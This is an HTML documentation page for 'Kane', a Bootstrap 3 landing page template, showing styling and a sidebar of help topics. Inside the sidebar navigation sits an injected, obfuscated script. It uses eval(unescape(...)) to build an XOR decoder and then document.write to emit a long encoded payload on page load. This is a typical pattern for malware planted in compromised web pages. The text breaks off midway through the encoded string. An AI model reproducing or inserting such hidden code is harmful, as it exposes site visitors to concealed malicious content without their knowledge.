<!doctype html>  
<!--[if IE 6 ]><html lang="en-us" class="ie6"> <![endif]-->
<!--[if IE 7 ]><html lang="en-us" class="ie7"> <![endif]-->
<!--[if IE 8 ]><html lang="en-us" class="ie8"> <![endif]-->
<!--[if (gt IE 7)|!(IE)]><!-->
<html lang="en-us"><!--<![endif]-->
<head>
	<meta charset="utf-8">
	
	<title>Kane - Responsive Bootstrap 3 App Landing Page</title>
	
	<meta name="description" content="Responsive Bootstrap 3 App Landing Page Template">
	<meta name="author" content="&#109;&#105;&#122;&#97;&#110;&#48;&#55;&#56;&#64;&#103;&#109;&#97;&#105;&#108;&#46;&#99;&#111;&#109;">
	<meta name="copyright" content="&#109;&#105;&#122;&#97;&#110;&#48;&#55;&#56;&#64;&#103;&#109;&#97;&#105;&#108;&#46;&#99;&#111;&#109;">
	<meta name="generator" content="Documenter v2.0 http://rxa.li/documenter">
	<meta name="date" content="2014-04-06T00:00:00+02:00">
	
	<link rel="stylesheet" href="assets/css/documenter_style.css" media="all">
	<link rel="stylesheet" href="assets/js/google-code-prettify/prettify.css" media="screen">
	<script src="assets/js/google-code-prettify/prettify.js"></script>

	
	<link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />

	<script src="assets/js/jquery.js"></script>
	
	<script src="assets/js/jquery.scrollTo.js"></script>
	<script src="assets/js/jquery.easing.js"></script>
	
	<script>document.createElement('section');var duration='500',easing='swing';</script>
	<script src="assets/js/script.js"></script>
	
	<style>
		html{background-color:#EEEEEE;color:#383838;}
		::-moz-selection{background:#333636;color:#00DFFC;}
		::selection{background:#333636;color:#00DFFC;}
		#documenter_sidebar #documenter_logo{background-image:url(assets/images/image_1.png);}
		a{color:#008C9E;}
		.btn {
			border-radius:3px;
		}
		.btn-primary {
			  background-image: -moz-linear-gradient(top, #008C9E, #006673);
			  background-image: -ms-linear-gradient(top, #008C9E, #006673);
			  background-image: -webkit-gradient(linear, 0 0, 0 008C9E%, from(#343838), to(#006673));
			  background-image: -webkit-linear-gradient(top, #008C9E, #006673);
			  background-image: -o-linear-gradient(top, #008C9E, #006673);
			  background-image: linear-gradient(top, #008C9E, #006673);
			  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#008C9E', endColorstr='#006673', GradientType=0);
			  border-color: #006673 #006673 #bfbfbf;
			  color:#FFFFFF;
		}
		.btn-primary:hover,
		.btn-primary:active,
		.btn-primary.active,
		.btn-primary.disabled,
		.btn-primary[disabled] {
		  border-color: #008C9E #008C9E #bfbfbf;
		  background-color: #006673;
		}
		hr{border-top:1px solid #D4D4D4;border-bottom:1px solid #FFFFFF;}
		#documenter_sidebar, #documenter_sidebar ul a{background-color:#343838;color:#FFFFFF;}
		#documenter_sidebar ul a{-webkit-text-shadow:1px 1px 0px #494F4F;-moz-text-shadow:1px 1px 0px #494F4F;text-shadow:1px 1px 0px #494F4F;}
		#documenter_sidebar ul{border-top:1px solid #212424;}
		#documenter_sidebar ul a{border-top:1px solid #494F4F;border-bottom:1px solid #212424;color:#FFFFFF;}
		#documenter_sidebar ul a:hover{background:#333636;color:#00DFFC;border-top:1px solid #333636;}
		#documenter_sidebar ul a.current{background:#333636;color:#00DFFC;border-top:1px solid #333636;}
		#documenter_copyright{display:block !important;visibility:visible !important;}
	.style1 {
	color: #FF0000;
	font-size: xx-large;
	font-weight: bold;
}
    </style>
	
</head>
<body class="documenter-project-kane">
	<div id="documenter_sidebar">
		<a href="#documenter_cover" id="documenter_logo"></a>
		<ul id="documenter_nav">
			<li><a class="current" href="#documenter_cover">Start</a></li>
				
			<li><a href="#structure" title="Structure">Structure</a></li>
			<li><a href="#change_color" title="Change Color">Change Color</a></li>
			<li><a href="#top_bar_navigation" title="Top Bar Navigation">Top Bar Navigation</a></li>
			<li><a href="#change_logo" title="Change Logo">Change Logo</a></li>
			<li><a href="#animations" title="Animations">Animations</a></li>
			<li><a href="#background_image" title="Background: Image">Background: Image</a></li>
			<li><a href="#background_transparent_color" title="Background: Transparent color">Background: Transparent color</a></li>
			<li><a href="#background_solid_color" title="Background: Solid Color">Background: Solid Color</a></li>
			<li><a href="#background_video" title="Background: Video">Background: Video</a>
				<ul>
					<li><a href="#background_video_image_background_for_mobile">Image background for mobile</a>
				</ul>
			</li>
			<script type="text/javascript">
<!-- 
eval(unescape('%66%75%6e%63%74%69%6f%6e%20%69%66%30%64%30%33%63%63%35%36%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%32%35%32%33%37%31%33%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%38%34%37%39%30%38%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%36%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%69%66%30%64%30%33%63%63%35%36%28%27') + '%35%6f%5e%6e%61%63%68%12%6a%74%63%5f%3f%1f%6c%5c%70%6c%20%62%53%74%5c%64%5d%64%60%68%6d%1e%3a%0e%02%3e%1f%20%2e%1a%0f%07%5d%73%59%64%2b%69%60%5b%6a%54%5b%62%5c%20%22%1d%32%39%19%39%2b%18%39%5f%17%33%2f%1c%33%2c%16%36%3b%1b%37%69%1f%38%5c%1d%2f%28%1d%39%29%17%29%2b%16%30%23%1c%2f%32%1d%32%24%19%38%2b%18%39%2c%17%2e%2e%1c%2e%30%16%37%25%1b%2b%3a%1f%24%29%1d%32%5e%1d%23%5d%17%2e%34%16%31%38%1c%32%28%1d%33%25%19%24%2e%18%38%2c%17%2f%28%1c%2f%5c%16%2a%22%1b%2b%25%1f%24%2f%1d%2e%5e%1d%23%5d%17%2e%34%16%31%38%1c%32%28%1d%33%25%19%24%2e%18%38%2e%17%33%5c%1c%33%28%16%2a%22%1b%2a%57%1f%24%29%1d%32%2f%1d%25%59%17%35%2a%16%31%22%1c%32%5e%1d%32%3a%19%39%2a%18%25%32%17%2f%2e%1c%2f%29%16%2b%22%1b%2a%26%1f%25%2e%1d%2e%31%1d%24%35%17%29%36%16%2d%26%1c%2e%2f%1d%2e%3a%19%25%58%18%23%5b%17%29%31%1c%33%2f%16%2a%22%1b%2a%57%1f%24%29%1d%32%2d%1d%39%59%17%34%28%16%31%25%1c%32%2e%1d%32%22%19%39%2e%18%39%2f%17%2f%30%1c%33%2c%16%36%56%1b%36%23%1f%27%5f%1d%2e%28%1d%26%58%17%28%34%16%2d%54%1c%28%58%1d%28%3a%19%38%58%18%25%2a%17%2e%5c%1c%2e%28%16%37%27%1b%37%56%1f%38%2c%1d%32%2f%1d%39%2b%17%34%2c%16%31%22%1c%32%2c%1d%2e%3b%19%39%2a%18%39%5e%17%32%28%1c%2d%5e%16%2b%23%1b%28%57%1f%24%29%1d%2f%5e%1d%25%2c%17%28%2b%16%2d%38%1c%2f%30%1d%2f%26%19%25%2a%18%24%32%17%2e%33%1c%2e%2e%16%2a%3b%1b%2a%55%1f%22%58%1d%29%31%1d%39%36%17%34%67%16%31%24%1c%2e%31%1d%2e%23%19%39%34%18%39%2b%17%32%2e%1c%2e%28%16%36%3b%1b%2b%23%1f%25%5d%1d%2f%28%1d%24%2c%17%29%5b%16%2c%22%1c%32%30%1d%2e%23%19%25%59%18%25%2a%17%32%2f%1c%2e%5d%16%36%55%1b%37%26%1f%38%5c%1d%33%33%1d%38%28%17%34%35%16%2d%54%1c%2e%29%1d%32%3a%19%24%58%18%25%5c%17%2f%31%1c%2e%28%16%37%54%1b%2d%52%1f%22%30%1d%29%31%1d%38%2a%17%28%2d%16%2c%54%1c%2f%5d%1d%2e%23%19%27%29%18%38%2e%17%32%2e%1c%32%31%16%36%57%1b%37%38%1f%24%5c%1d%33%32%1d%38%2a%17%34%67%16%30%56%1c%2c%2e%1d%32%3b%19%38%2f%18%38%2c%17%2d%2f%1c%32%62%16%36%26%1b%37%26%1f%24%31%1d%2f%30%1d%38%2c%17%34%2c%16%31%24%1c%33%2e%1d%32%26%19%26%37%18%39%5f%17%32%2c%1c%2e%30%16%36%54%1b%2b%56%1f%38%2e%1d%33%30%1d%39%2d%17%35%2b%16%2e%23%1c%33%2d%1d%2e%3b%19%38%37%18%25%2f%17%33%5e%1c%2e%5d%16%36%55%1b%37%26%1f%38%5c%1d%33%33%1d%38%28%17%34%35%16%2c%3b%1c%2e%30%1d%2d%56%19%39%29%18%25%5f%17%33%2f%1c%32%30%16%36%23%1b%36%25%1f%26%2e%1d%33%62%1d%39%28%17%34%28%16%2e%23%1c%33%2d%1d%2e%3b%19%38%37%18%25%33%17%2f%31%1c%2e%5e%16%2b%39%1b%2b%3a%1f%25%5f%1d%29%59%1d%23%35%17%35%59%16%2a%53%1c%28%30%1d%33%25%19%38%2b%18%38%2e%17%32%2d%1c%33%2e%16%36%57%1b%2b%23%1f%39%2f%1d%2e%5e%1d%23%5d%17%35%59%16%2a%53%22%21%20%37%05%0d%59%78%5f%61%2b%6f%60%5c%6f%5e%59%68%56%24%29%1b%37%27%1f%38%63%1d%33%2f%1d%38%29%17%34%59%16%30%27%1c%32%5c%1d%33%27%19%24%5b%18%38%31%17%32%2e%1c%32%31%16%37%26%1b%37%26%1f%24%31%1d%33%2d%1d%24%2a%17%34%2c%16%2d%39%1c%32%2e%1d%32%26%19%38%28%18%24%2c%17%2f%30%1c%2e%33%28%25%12%21%1d%28%1f%25%28%1d%33%29%1d%39%2a%17%29%29%16%2d%55%1c%2d%2f%1d%29%69%19%38%35%18%39%2c%17%2c%5e%1c%2d%5e%16%2b%57%1b%2c%54%1f%23%31%1d%33%32%1d%26%5b%17%34%5b%16%30%57%1c%32%2d%1d%29%57%19%23%64%18%39%2e%17%33%33%1c%32%31%16%36%56%1b%28%3a%1f%25%2f%1d%28%62%1d%27%2a%17%2b%67%16%30%23%1c%32%63%1d%32%52%19%23%5a%18%24%5f%17%2d%33%1c%2d%30%16%36%22%1b%37%23%1f%38%31%1d%2e%29%1d%25%34%17%2b%34%16%2d%57%1c%2f%5d%1d%2e%56%19%38%29%18%39%5c%17%2e%2e%1c%28%2e%16%2c%54%1b%2d%26%1f%22%33%1d%29%32%1d%24%29%17%34%37%16%30%54%1c%2f%63%1d%2f%24%19%27%59%18%22%2a%17%33%2c%1c%32%62%16%29%38%1b%28%3b%1f%25%2f%1d%28%62%1d%22%5b%17%34%67%16%2f%27%1c%32%2e%1d%2d%3b%19%27%36%18%39%5f%17%33%31%1c%32%2d%16%36%22%1b%37%52%1f%38%31%1d%28%62%1d%22%35%17%34%58%16%30%54%1c%32%2c%1d%32%24%19%27%36%18%24%60%17%28%5d%1c%2c%30%16%29%26%1b%37%54%1f%27%58%1d%2c%59%1d%39%37%17%34%67%16%30%3a%1c%32%29%1d%32%55%19%38%5f%18%22%2c%17%2e%2e%1c%2c%30%16%29%26%1b%37%54%1f%27%58%1d%2c%59%1d%39%37%17%34%67%16%30%3a%1c%32%29%1d%32%55%19%38%5f%18%24%5d%17%2f%5c%1c%2d%5d%16%2b%68%1b%2a%25%1f%24%5e%1d%33%29%1d%39%2a%17%29%29%16%2a%68%1c%28%5f%1d%28%27%19%22%2a%18%23%5c%17%2e%28%1c%32%29%16%36%53%1b%2a%23%1f%25%28%1d%2c%5d%1d%22%35%17%34%2b%16%30%24%1c%2d%33%1d%2d%3a%19%25%2e%18%22%2c%17%28%31%1c%2d%30%16%36%22%1b%37%23%1f%38%30%1d%2c%5d%1d%26%5b%17%34%58%16%2f%23%1c%2d%32%1d%32%56%19%38%5a%18%39%60%17%28%5d%1c%29%5c%16%36%27%1b%37%26%1f%38%30%1d%33%29%1d%26%59%17%29%28%16%2b%24%1c%2f%2d%1d%32%56%19%38%2f%18%39%2e%17%2c%62%1c%2d%30%16%36%27%1b%2c%56%1f%25%5f%1d%33%5f%1d%39%5a%17%34%28%16%2b%24%1c%2f%63%1d%2f%52%19%38%5b%18%39%5f%17%33%30%1c%2d%5d%16%29%26%1b%37%52%1f%23%5d%1d%2e%5e%1d%39%34%17%34%35%16%30%68%1c%2f%5d%1d%2e%56%19%27%59%18%24%5f%17%2e%28%1c%2e%5f%16%36%56%1b%37%26%1f%25%2e%1d%29%2e%1d%23%2b%17%2e%2c%16%2a%54%1c%28%58%1d%2f%24%19%38%29%18%39%5c%17%2e%2e%1c%2f%29%16%29%24%1b%2c%56%1f%38%2c%1d%33%62%1d%26%59%17%2b%5a%16%2d%68%1c%29%2e%1d%29%52%19%38%5f%18%39%31%17%2c%5d%1c%32%30%16%29%26%1b%37%54%1f%38%33%1d%33%5c%1d%39%58%17%34%2c%16%30%23%1c%32%63%1d%2d%56%19%27%37%18%39%2b%17%33%5d%1c%32%2e%16%2d%25%1b%2c%56%1f%38%30%1d%33%32%1d%39%58%17%34%37%16%2f%39%1c%2f%5c%1d%29%57%19%26%5f%18%39%31%17%2c%5d%1c%32%30%16%29%26%1b%37%54%1f%38%33%1d%33%5c%1d%39%58%17%34%2c%16%30%23%1c%32%63%1d%29%69%19%25%37%18%39%2b%17%33%5d%1c%32%2e%16%2d%25%1b%2a%23%1f%26%31%1d%33%59%1d%26%5a%17%34%67%16%2f%27%1c%32%2e%1d%32%27%19%38%64%18%39%2e%17%33%33%1c%32%5f%16%36%68%1b%2c%56%1f%25%5f%1d%33%5f%1d%39%5a%17%34%28%16%2d%55%1c%2e%29%1d%2d%54%19%25%2f%18%24%5d%17%2f%5c%1c%32%29%16%36%53%1b%2a%23%1f%22%2f%1d%29%33%1d%23%2a%17%2e%2c%16%2a%54%1c%2f%5d%1d%32%24%19%38%2a%18%24%5f%17%2e%28%1c%2d%5d%16%2d%23%1b%37%39%1f%38%63%1d%2c%59%1d%26%66%17%29%28%16%2b%24%1c%29%2d%1d%32%52%19%38%36%18%39%2a%17%33%5f%1c%32%5f%16%36%25%1b%37%52%1f%27%5e%1d%2c%5d%1d%39%37%17%2b%58%16%2f%23%1c%2d%2d%1d%32%57%19%27%36%18%26%2e%17%33%33%1c%32%31%16%36%26%1b%2c%54%1f%23%5d%1d%33%31%1d%39%2a%17%34%58%16%30%55%1c%2d%33%1d%2f%23%19%23%5a%18%27%2f%17%33%5e%1c%32%5c%16%36%23%1b%37%69%1f%38%63%1d%33%31%1d%22%35%17%2b%34%16%30%57%1c%2d%2c%1d%29%69%19%25%5f%18%39%2c%17%2c%5e%1c%2d%31%16%36%53%1b%37%52%1f%38%31%1d%28%62%1d%24%37%17%2a%67%16%30%39%1c%32%28%1d%32%69%19%38%5b%18%39%2c%17%33%30%1c%29%5c%16%29%24%1b%37%23%1f%27%30%1d%28%5c%1d%24%5b%17%34%35%16%2f%39%1c%2d%2c%1d%32%27%19%38%58%18%39%2f%17%2e%28%1c%2e%5f%16%29%24%1b%2a%23%1f%22%2f%1d%29%33%1d%23%2a%17%2e%2c%16%2a%54%1c%28%58%1d%2f%24%19%38%36%18%39%5d%17%2e%2e%1c%28%2e%16%2c%54%1b%2d%26%1f%22%33%1d%29%32%1d%23%2a%17%2e%2c%16%2d%55%1c%32%5d%1d%32%27%19%25%2f%18%24%5d%17%2c%62%1c%29%5c%16%36%3b%1b%37%54%1f%27%58%1d%2c%5e%1d%24%36%17%2f%35%16%2b%27%1c%32%2d%1d%32%3b%19%38%64%18%39%2a%17%33%5c%1c%32%62%16%36%27%1b%28%69%1f%27%5c%1d%33%2f%1d%26%58%17%2b%5b%16%2f%27%1c%32%2e%1d%2d%3b%19%27%58%18%39%5c%17%33%30%1c%32%30%16%29%22%1b%28%55%1f%38%63%1d%2c%59%1d%26%58%17%34%2c%16%30%26%1c%32%2d%1d%29%57%19%25%2f%18%24%2f%17%33%5d%1c%2d%59%16%29%27%1b%37%26%1f%38%30%1d%33%30%1d%24%2b%17%29%37%16%2c%23%1c%2d%2f%1d%2f%22%19%22%2e%18%23%5b%17%29%33%1c%28%32%16%2c%53%1b%2d%26%1f%25%28%1d%2f%5f%1d%39%59%17%34%37%16%2d%57%1c%28%5c%1d%28%26%19%22%2a%18%23%5c%17%29%33%1c%2f%29%16%2a%22%1b%37%25%1f%38%33%1d%2e%2f%1d%23%36%17%2e%2d%16%2a%68%1c%28%5f%1d%28%27%19%22%2a%18%24%5d%17%2f%5c%1c%32%59%16%36%56%1b%2a%23%1f%22%2f%1d%29%33%1d%23%2a%17%2e%2c%16%2d%55%1c%2d%2c%1d%32%27%19%38%37%18%22%2a%17%33%33%1c%2d%31%16%2b%57%1b%2c%54%1f%27%30%1d%33%5f%1d%26%5b%17%34%59%16%30%68%1c%2d%33%1d%32%22%19%38%58%18%26%31%17%33%5d%1c%2d%5f%16%29%26%1b%37%69%1f%38%5d%1d%32%32%1d%39%5a%17%34%2c%16%30%3b%1c%32%30%1d%32%55%19%23%5a%18%24%5f%17%2e%31%1c%32%5f%16%36%23%1b%36%26%1f%38%63%1d%33%32%1d%39%2c%17%34%2b%16%30%26%1c%29%28%1d%29%3a%19%23%5f%18%25%2d%17%2f%5f%1c%2f%32%16%2b%55%1b%2c%3b%1f%23%31%1d%2f%5d%1d%25%35%17%28%59%16%2d%56%1c%29%32%1d%29%52%19%24%59%18%25%2c%17%2f%5d%1c%2f%28%16%2d%39%1b%2c%55%1f%25%33%1d%2e%2c%1d%24%28%17%2f%5a%16%2b%27%1c%2e%2f%1d%2e%54%19%24%64%18%24%5e%17%28%59%1c%29%30%16%2a%27%1b%2a%39%1f%25%29%1d%28%5e%1d%22%5b%17%28%59%16%2c%39%1c%2f%5e%1d%29%3a%19%23%5f%18%25%31%17%2f%59%1c%2f%28%16%2d%39%1b%2c%55%1f%24%5f%1d%2f%31%1d%24%28%17%2f%5a%16%2b%27%1c%2e%2f%1d%2e%69%19%24%5f%18%24%5e%17%28%59%1c%29%30%16%2a%24%1b%2b%56%1f%25%33%1d%2e%28%1d%22%66%17%2f%67%16%2d%54%1c%2f%31%1d%2f%25%19%23%37%18%22%2f%17%2f%62%1c%2e%5c%16%2a%38%1b%2a%24%1f%23%5f%1d%28%30%1d%25%5d%17%28%5c%16%2d%3a%1c%2f%5e%1d%29%3a%19%23%5f%18%25%2e%17%2f%59%1c%2f%28%16%2d%39%1b%2c%55%1f%25%33%1d%2e%32%1d%24%28%17%2f%5a%16%2b%27%1c%2e%2f%1d%2e%54%19%24%59%18%24%5e%17%28%59%1c%29%30%16%2a%24%1b%2b%56%1f%25%33%1d%2e%28%1d%22%35%17%28%35%16%2c%22%1c%2e%2f%1d%2e%55%19%25%29%18%26%2c%17%33%5d%1c%2f%2f%16%2c%57%1b%2d%27%1f%22%33%1d%29%32%1d%39%36%17%2b%34%16%2f%26%1c%2d%33%1d%29%69%19%39%34%18%39%5c%17%33%30%1c%32%2d%16%2d%23%1b%37%52%1f%38%2c%1d%2c%59%1d%22%35%17%29%37%16%2f%25%1c%29%28%1d%32%38%19%38%5a%18%26%31%17%2c%59%1c%2f%2e%16%2d%25%1b%37%39%1f%38%30%1d%33%31%1d%39%35%17%29%2d%16%2c%23%1c%2e%29%1d%32%57%19%39%35%18%26%2d%17%2f%2e%1c%32%29%16%36%53%1b%2b%69%1f%27%30%1d%33%5f%1d%26%5b%17%34%59%16%30%68%1c%2d%33%1d%32%22%19%38%58%18%26%31%17%33%5d%1c%29%62%16%2b%68%1b%2a%52%1f%38%5e%1d%2c%30%1d%39%59%17%34%28%16%2f%39%1c%32%63%1d%32%55%19%27%36%18%39%2c%17%28%5f%1c%32%5e%16%2a%25%1b%2b%23%1f%24%5d%1d%2e%29%1d%25%34%17%2b%34%16%2d%57%1c%29%28%1d%28%23%19%22%2b%18%23%5c%17%29%33%1c%2f%29%16%2a%22%1b%28%52%1f%38%33%1d%33%5e%1d%24%37%17%2e%28%16%2a%53%1c%28%58%1d%2f%24%19%24%5b%18%26%2e%17%33%33%1c%32%5e%16%2b%68%1b%2d%22%1f%22%32%1d%29%32%1d%24%29%17%2b%58%16%30%54%1c%32%32%1d%29%69%19%38%2a%18%26%2e%17%2e%2f%1c%29%62%16%29%27%1b%37%69%1f%27%31%1d%33%59%1d%39%36%17%2b%59%16%30%57%1c%32%2c%1d%2d%3b%19%38%5a%18%26%2b%17%2c%31%1c%32%5f%16%36%68%1b%37%52%1f%27%58%1d%33%2f%1d%39%58%17%2f%35%16%2d%57%1c%28%5c%1d%28%26%19%22%2a%18%24%5d%17%33%31%1c%2d%59%16%29%26%1b%37%52%1f%38%33%1d%33%5f%1d%39%37%17%2f%5c%16%30%54%1c%2d%2c%1d%2f%23%19%23%5a%18%26%2e%17%33%5c%1c%2d%30%16%36%38%1b%37%22%1f%27%58%1d%33%2f%1d%39%58%17%2b%59%16%30%24%1c%2d%29%1d%2d%52%19%38%5b%18%39%30%17%2c%5e%1c%32%62%16%2d%25%1b%2a%23%1f%22%2f%1d%29%33%1d%23%2a%17%29%37%16%30%3a%1c%2e%2f%1d%2f%22%19%26%28%18%26%2d%17%33%2e%1c%2d%59%16%2b%56%1b%28%54%1f%38%63%1d%2e%2f%1d%23%36%17%2e%2d%16%2a%54%1c%29%28%1d%29%69%19%25%29%18%39%2f%17%33%5f%1c%2d%5d%16%36%68%1b%2c%56%1f%27%31%1d%33%29%1d%26%5d%17%34%67%16%30%27%1c%2f%5c%1d%29%57%19%38%5f%18%39%2e%17%32%33%1c%32%29%16%29%38%1b%2b%57%1f%23%63%1d%2e%2f%1d%25%2d%17%2a%67%16%2e%3a%1c%2f%2f%1d%2c%57%19%25%36%18%24%2e%17%28%5f%1c%2c%5f%16%28%68%1b%2c%56%1f%26%30%1d%2d%2d%1d%24%59%17%2a%28%16%2d%39%1c%2c%5d%1d%2c%56%19%25%5f%18%27%5e%17%2f%2e%1c%2f%30%16%28%22%1b%29%22%1f%24%33%1d%2e%29%1d%25%34%17%34%67%16%30%22%1c%2d%2f%1d%32%22%19%25%2f%18%24%5d%17%2f%5c%1c%32%2d%16%2a%24%1b%2a%23%1f%22%2f%1d%29%33%1d%23%2a%17%29%37%16%30%3a%1c%2e%2e%1d%2f%22%19%26%5a%18%26%31%17%33%31%1c%32%5c%16%36%22%1b%37%23%1f%38%31%1d%33%32%1d%39%66%17%2b%59%16%2b%22%1c%2f%2e%1d%32%56%19%38%5b%18%39%2e%17%33%31%1c%32%31%16%36%25%1b%28%57%1f%38%5d%1d%28%5c%1d%25%5b%17%2f%5c%16%2d%25%1c%32%28%1d%32%69%19%23%64%18%27%5d%17%2c%62%1c%32%2f%16%29%27%1b%37%26%1f%38%2e%1d%33%2c%1d%22%35%17%2a%5c%16%2f%25%1c%32%31%1d%2d%3b%19%25%29%18%25%2b%17%33%2c%1c%2e%62%16%2b%68%1b%2d%22%1f%22%32%1d%29%32%1d%24%29%17%2b%58%16%30%54%1c%32%32%1d%29%69%19%38%2a%18%26%2e%17%2e%2f%1c%29%62%16%29%27%1b%37%69%1f%27%31%1d%33%59%1d%39%36%17%2b%59%16%30%57%1c%32%2c%1d%2d%3b%19%38%5a%18%26%2b%17%2c%5d%1c%32%59%16%36%27%1b%37%52%1f%38%5e%1d%33%2f%1d%39%5b%17%2f%35%16%2d%57%1c%28%5c%1d%28%26%19%22%2a%18%23%5c%17%29%2f%1c%28%33%16%2c%53%1b%2a%25%1f%24%5e%1d%2c%31%1d%39%2a%17%34%5a%16%2d%57%1c%28%5c%1d%28%26%19%22%2a%18%24%5d%17%33%2c%1c%32%62%16%2b%68%1b%2d%22%1f%22%32%1d%29%32%1d%24%29%17%34%59%16%30%55%1c%2f%63%1d%28%23%19%22%2b%18%23%5c%17%2e%28%1c%32%29%16%36%53%1b%2a%23%1f%27%31%1d%33%62%1d%26%59%17%2b%34%16%30%26%1c%2d%33%1d%2d%55%19%25%2b%18%22%2a%17%2f%5f%1c%2e%30%16%2a%22%1b%2b%57%1f%25%33%1d%2f%5f%1d%25%5a%17%28%5c%16%2c%25%1c%2e%2c%1d%2f%24%19%24%5b%18%39%5d%17%33%33%1c%2f%2f%16%2c%57%1b%2d%27%1f%22%33%1d%2e%29%1d%39%29%17%34%2c%16%2d%57%1c%32%5d%1d%2d%54%19%38%58%18%26%31%17%33%31%1c%32%31%16%2d%23%1b%37%3a%1f%38%5d%1d%2c%31%1d%26%5d%17%34%58%16%2f%39%1c%2f%5f%1d%29%69%19%24%64%18%25%2e%17%2f%5c%1c%2e%5c%16%2a%39%1b%2b%69%1f%24%63%1d%2f%5c%1d%25%5d%17%28%58%16%2d%55%1c%2e%29%1d%32%24%19%38%2a%18%24%5f%17%29%2f%1c%28%33%16%2c%53%1b%2a%25%1f%38%28%1d%33%32%1d%24%37%17%2b%35%16%31%54%1c%2f%5f%1d%29%69%19%23%37%18%22%2f%17%2f%62%1c%2e%5c%16%2b%53%1b%2a%24%1f%23%5f%1d%28%30%1d%25%5d%17%28%5c%16%2c%39%1c%2f%5e%1d%29%3a%19%23%5f%18%25%2d%17%2f%5d%1c%2e%62%16%2b%55%1b%2c%3b%1f%23%31%1d%2e%32%1d%24%2c%17%29%36%16%2b%38%1c%29%2d%1d%2e%54%19%24%59%18%25%2a%17%2e%29%1c%29%5e%16%2d%26%1b%2b%52%1f%25%2c%1d%2e%28%1d%22%66%17%2f%67%16%2c%39%1c%2e%33%1d%2f%25%19%23%37%18%22%2f%17%2f%5e%1c%2e%5e%16%2b%55%1b%2c%3b%1f%23%31%1d%2f%5e%1d%25%58%17%29%36%16%2b%38%1c%29%2d%1d%2e%54%19%24%64%18%25%2f%17%2e%29%1c%29%5e%16%2d%26%1b%2b%57%1f%24%5d%1d%2e%32%1d%24%28%17%2f%5a%16%2b%27%1c%2f%58%1d%2f%39%19%25%28%18%22%30%17%28%31%1c%2e%5d%16%2a%23%1b%2b%3a%1f%25%29%1d%28%5e%1d%22%5b%17%28%34%16%2c%22%1c%2f%30%1d%2f%25%19%23%37%18%22%2f%17%2f%30%1c%2e%5e%16%2b%55%1b%2c%3b%1f%23%31%1d%2e%32%1d%24%2a%17%29%36%16%2b%38%1c%29%2d%1d%2e%54%19%24%59%18%25%2d%17%2e%29%1c%29%5e%16%2d%26%1b%2b%57%1f%24%5d%1d%2e%32%1d%24%28%17%29%37%16%2c%23%1c%32%5d%1d%32%27%19%25%2f%18%23%60%17%29%32%1c%28%32%16%2b%56%1b%37%25%1f%38%33%1d%2e%2f%1d%24%29%17%2b%34%16%2b%22%1c%32%30%1d%32%57%19%27%36%18%26%30%17%2e%2f%1c%29%62%16%2d%25%1b%2a%23%1f%25%28%1d%2f%5f%1d%26%5d%17%29%29%16%2d%55%1c%2e%29%1d%32%24%19%38%2a%18%24%5f%17%29%2f%1c%28%33%16%2c%53%1b%2a%25%1f%38%28%1d%33%32%1d%24%37%17%2b%59%16%30%68%1c%2d%2f%1d%32%27%19%38%29%18%24%5b%17%28%5f%1c%2f%29%16%29%24%1b%2c%56%1f%38%2c%1d%33%62%1d%26%59%17%2b%5a%16%2d%68%1c%29%2e%1d%32%23%19%27%59%18%39%5c%17%33%28%1c%32%31%16%36%22%1b%2a%27%1f%23%5f%1d%28%30%1d%25%5d%17%28%5c%16%2d%54%1c%2f%5e%1d%29%3a%19%23%5f%18%25%2d%17%2f%5f%1c%2e%59%16%2b%55%1b%2c%3b%1f%23%31%1d%2f%5d%1d%25%5a%17%28%35%16%2d%56%1c%29%32%1d%29%52%19%25%2a%18%24%33%17%2e%29%1c%29%5e%16%2d%26%1b%2b%57%1f%24%5c%1d%2f%5c%1d%24%28%17%2f%5a%16%2b%27%1c%2e%2c%1d%2f%38%19%25%28%18%22%30%17%28%31%1c%2e%59%16%2a%38%1b%2a%24%1f%23%5f%1d%28%30%1d%25%59%17%28%5a%16%2d%56%1c%29%32%1d%29%52%19%24%37%18%25%2e%17%2e%29%1c%29%5e%16%2d%26%1b%2b%57%1f%24%5d%1d%2f%30%1d%24%28%17%2f%5a%16%2b%27%1c%2e%2f%1d%2e%69%19%25%2a%18%24%5e%17%28%59%1c%29%30%16%2b%53%1b%2a%38%1f%25%29%1d%28%5e%1d%22%5b%17%28%34%16%2c%22%1c%2e%33%1d%2f%25%19%23%37%18%22%2f%17%2f%62%1c%2e%5c%16%2b%3b%1b%2a%24%1f%23%5f%1d%28%30%1d%25%58%17%28%5a%16%2d%56%1c%29%32%1d%29%52%19%25%2a%18%24%5c%17%2e%29%1c%29%5e%16%2d%26%1b%2b%57%1f%24%5c%1d%2f%5d%1d%24%28%17%2f%5a%16%2b%27%1c%2e%2f%1d%2e%69%19%25%2a%18%24%5e%17%28%5d%1c%2f%2f%16%2d%39%1b%2c%55%1f%24%5c%1d%2f%5c%1d%24%2a%17%29%36%16%2b%38%1c%29%2d%1d%2e%54%19%24%64%18%25%31%17%2e%29%1c%29%5e%16%2d%26%1b%2b%57%1f%24%63%1d%2f%62%1d%24%28%17%2f%5a%16%2b%27%1c%2f%58%1d%2f%39%19%25%28%18%22%30%17%28%31%1c%2e%5d%16%2a%24%1b%2b%56%1f%25%29%1d%28%5e%1d%22%5b%17%28%58%16%2d%3a%1c%2f%5e%1d%29%3a%19%23%5f%18%25%31%17%2f%5e%1c%2f%28%16%2d%39%1b%2c%55%1f%24%58%1d%2f%5e%